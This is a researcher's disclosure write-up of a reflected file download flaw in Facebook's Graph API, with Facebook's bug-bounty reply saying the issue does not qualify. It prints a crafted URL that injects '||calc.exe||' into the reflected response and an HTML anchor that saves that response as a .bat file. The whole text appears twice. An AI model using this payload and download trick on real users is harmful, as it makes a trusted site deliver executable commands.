Before starting with the write up i want to share the response that i got from facebook after reporting the bug.
Hi Rio,
Thank you for sharing this information with us. Although this issue does not qualify as a part of our bounty program we appreciate your report. We will follow up with you on any security bugs or with any further questions we may have.
I will let you guys decide if its a vulnerability or not.
Lets begin.
The vulnerability existed and still exists at
https://graph.facebook.com/
The vulnerability exists because the api reflects data from the url and since we can inject a malicious payload.
Visiting the following url:
https://graph.facebook.com/injected%20in%20json%7C%7Ccalc.exe%7C%7C?callback=random
Since the data is reflected our main goal is to to make this get saved as a file.
Facebook did not have a content-disposition so our way to download is to use html5 download attribute.
Lets create a html file. ("test.html") and put the following content.
<a href='https://graph.facebook.com/rio/;/test.bat;"||calc.exe||?callback=random' download="test.bat">Download</a>
Now lets open the test.html and click download.
Basically we downloaded a bat file with our injected payload from the facebook website.
VIDEO:
Thanks
Rio Sherri
Hi Rio,
Thank you for sharing this information with us. Although this issue does not qualify as a part of our bounty program we appreciate your report. We will follow up with you on any security bugs or with any further questions we may have.
I will let you guys decide if its a vulnerability or not.
Lets begin.
The vulnerability existed and still exists at
https://graph.facebook.com/
The vulnerability exists because the api reflects data from the url and since we can inject a malicious payload.
Visiting the following url:
https://graph.facebook.com/injected%20in%20json%7C%7Ccalc.exe%7C%7C?callback=random
Since the data is reflected our main goal is to to make this get saved as a file.
Facebook did not have a content-disposition so our way to download is to use html5 download attribute.
Lets create a html file. ("test.html") and put the following content.
<a href='https://graph.facebook.com/rio/;/test.bat;"||calc.exe||?callback=random' download="test.bat">Download</a>
Now lets open the test.html and click download.
Basically we downloaded a bat file with our injected payload from the facebook website.
VIDEO:
Thanks
Rio Sherri